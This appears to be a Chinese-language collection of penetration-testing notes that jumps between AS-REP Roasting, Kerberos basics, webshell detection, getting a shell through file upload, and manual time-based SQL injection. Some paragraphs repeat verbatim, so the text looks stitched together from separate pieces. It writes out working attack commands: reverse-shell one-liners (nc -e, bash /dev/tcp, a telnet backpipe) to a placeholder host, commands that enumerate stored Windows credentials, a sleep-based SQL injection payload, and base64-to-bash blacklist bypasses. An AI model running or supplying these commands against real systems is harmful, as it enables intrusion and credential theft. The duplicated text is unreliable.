AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。
但是该攻击方式利用比较局限,因为其需要用户账号设置 "Do not require Kerberos preauthentication(不需要kerberos预身份验证) " 。而该属性默认是没有勾选上的。
AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。
但是该攻击方式利用比较局限,因为其需要用户账号设置 "Do not require Kerberos preauthentication(不需要kerberos预身份验证) " 。而该属性默认是没有勾选上的。
Kerberos是由MIT大学提出的一种网络身份验证协议,旨在通过使用密钥加密技术为C/S应用程序提供强身份验证。其实现涉及到密钥分发与密钥共享的概念。
Kerberos是基于对称加密体制(Needham-Schroeder认证协议) 的第三方认证机制,其中用户和服务依赖于第三方(Kerberos 服务器)来对彼此进行身份验证,它有两个版本v4和v5。Kerberos认证时可以使用UDP或TCP协议。
Kerberos主要有三个角色组成
1) KDC (服务器本身称为密钥分发中心)
2) AS (Authentication Server)认证服务器
3) TGS (Ticket Granting Server)票据授权服务器
使用Webshell一般不会在系统日志中留下记录,但是会在网站的web日志中留下Webshell页面的访问数据和数据提交记录。日志分析检测技术通过大量的日志文件建立请求模型从而检测出异常文件,称之为:HTTP异常请求模型检测。它的优点为当网站上的访问量级达到一致值时,这种检测方法具有比较大参考性价值。它的缺点则是存在一定误报率,对于大量的日志文件,检测工具的处理能力和效率都会变的比较低。
静态检测是指对脚本文件中所使用的关键词、高危函数、文件修改的时间、文件权限、文件的所有者以及和其它文件的关联性等多个维度的特征进行检测,即先建立一个恶意字符串特征库。对已知的webshell查找准确率高,但缺点是漏报率、误报率高,无法查找0day型webshell,而且容易被绕过。
查看当前服务器历史记录
#查看rdp连接历史记录
cmdkey /list
查找保存在本地的认证,得到对应路径以及值
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
监听23333端口:
nc -lvp 23333
反弹shell的方式比较多,这里挑一两个例子:
nc -e /bin/bash x.x.x.x 23333
bash -i >& /dev/tcp/x.x.x.x/23333 0>&1
0<&137-;exec 137<>/dev/tcp/x.x.x.x/23333;sh <&137 >&137 2>&137
mknod backpipe p && telnet x.x.x.x 2 0< backpipe | /bin/bash 1> backpipe
获取WebShell的动作又叫做GetShell,是渗透测试各项能力的综合体现,也是渗透测试一个重要的阶段性目标。
GetShell方式众多,常见如文件上传、SQL注入、命令执行、文件包含、解析漏洞等等。有时候一个漏洞即可GetShell,有时候则需要各种漏洞打一套组合拳方可。
通过利用任意文件上传漏洞可以最快获取WebShell,一般常见有三种情况:
(1)直接上传木马文件到目标服务器;
(2)绕过防护(以下不包括绕过WAF防护,以后有时间再介绍绕过WAF的姿势)限制上传木马文件;
(3)CMS等的通用任意文件上传漏洞。在对目标进行渗透测试时,可从前后台头像修改、文件导入、图片上传等处寻找文件上传接口。此外,还需要根据识别的站点指纹寻找是否存在文件上传漏洞。
通过Netstat命令查看MSSQL数据库1433端口的网络连接状态或者Mysql数据库的3306端口的网络连接状态。
netstat -ano | findstr "1433"
通过网站程序数据库配置文件来判断是否站库分离,如果数据库IP地址是localhost、127.0.0.1或当前主机内网IP则说明为同服务器,反之则可能为站库分离,自建公网数据库和RDS云数据库除外。
确定了一个sql注入点存在延时注入,因为存在拦截或者过滤又没办法使用sqlmap等工具直接跑数据。那么用手工测试该如何去拿数据呢。
例如下面的uname参数存在延时注入
在uname参数值后面加上
'and(select*from(select+sleep(5))a)and'a'='
发现存在延时,可以基本确定这个点存在sql注入
Kerberos是由MIT大学提出的一种网络身份验证协议,旨在通过使用密钥加密技术为C/S应用程序提供强身份验证。其实现涉及到密钥分发与密钥共享的概念。
Kerberos是基于对称加密体制(Needham-Schroeder认证协议) 的第三方认证机制,其中用户和服务依赖于第三方(Kerberos 服务器)来对彼此进行身份验证,它有两个版本v4和v5。Kerberos认证时可以使用UDP或TCP协议。
绕过黑名单主要有以下方法
拼接
[root@localhost home]# a=ca;b=t;c=1; $a$b $c.txt
base64编码
[root@localhost home]#
echo "Y2F0IGZsYWc="|base64 -d
或者
[root@localhost home]# echo "Y2F0IGZsYWc="|base64 -d|bash